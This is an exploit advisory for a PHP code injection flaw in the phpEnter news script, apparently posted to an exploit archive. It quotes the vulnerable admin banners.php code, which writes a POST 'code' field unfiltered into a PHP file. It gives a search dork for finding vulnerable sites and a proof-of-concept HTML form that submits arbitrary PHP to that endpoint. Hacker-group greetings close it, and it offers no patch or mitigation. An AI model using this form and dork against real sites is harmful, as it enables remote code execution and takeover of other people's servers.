# Exploit Title : Php Enter Php Code Injection
# Author        : IrIsT.Ir & Sec4Ever.com
# Discovered By : L3b-r1'z
# Home          : http://IrIsT.Ir & http://Sec4Ever.com
# P Blob        : http://L3b-r1z.com/
# Software Link : http://www.phpenter.net/
# Security Risk : High
# Version       : beta
# Tested on     : win\XP
# Dork          : allintext: "Powered by phpEnter.net"
# 1) Info Script
# 2) Info Vulnerability
# 3) P0c
# 1) Info Script:
# PHP Enter is a free and Open Source PHP News Publishing script.
# It is an online news publishing system that features easy installation,
user submission.
# and an admin panel for adding, editing and removing categories and news.
# 2) Info Vulnerability :
# This exploit allow attacker to inject php code execution like
# In file named banners in admin folder :
# 1. <?php
# 2. if(isset($_POST['submit']))
# 3. {
# 4. $ccode = $_POST['code'];
# 5.
# 6. $myFile="horad.php";
# 7. $fh = fopen($myFile, 'w') or die("can't open file- check CHMOD");
# 8. $stringData = "$ccode";
# 9. fwrite($fh, $stringData);
# 10. fclose($fh);
# 11. echo"<br /><center><font size=2
# 12. }else{
# 13. ?>
# Look to line 7 fopen MYFILE , $myfile="horad.php" or die can't open file
check chmod.
# fwrite FH variable and stringdata, So String Data doesn't secure :), can
attacker to inject php code execution.
# Look to line 4 : $_POST['code'];, attacker will inject in POST from any
tool dev, like HTTP LIVE EDITOR, HTTP Live headers.
#  3) p0c :
# <form method="post" action="http://localhost/admin/banners.php">
# <center>
# <font color=#3A586A>Code</font><br />
# <textarea name="code"></textarea>
# <br /><br />
# <input type="submit" name="submit" VALUE=" Submit"><br /><br /><br /><br
# </form>
# Special Thx to : Irist.ir Team & Sec4ever.com Team
# Greet'z : Am1r, The Injector, Sec4ever, b0x, Paulzz, Virus-Ra3ech,
# Hacker-1420, Th3 Killer Dz, OVER-X <3, Stalk3r, The Viper, N4ss1m, B07
# Ked-Ans, And All Members Of Irist And Sec4ever Team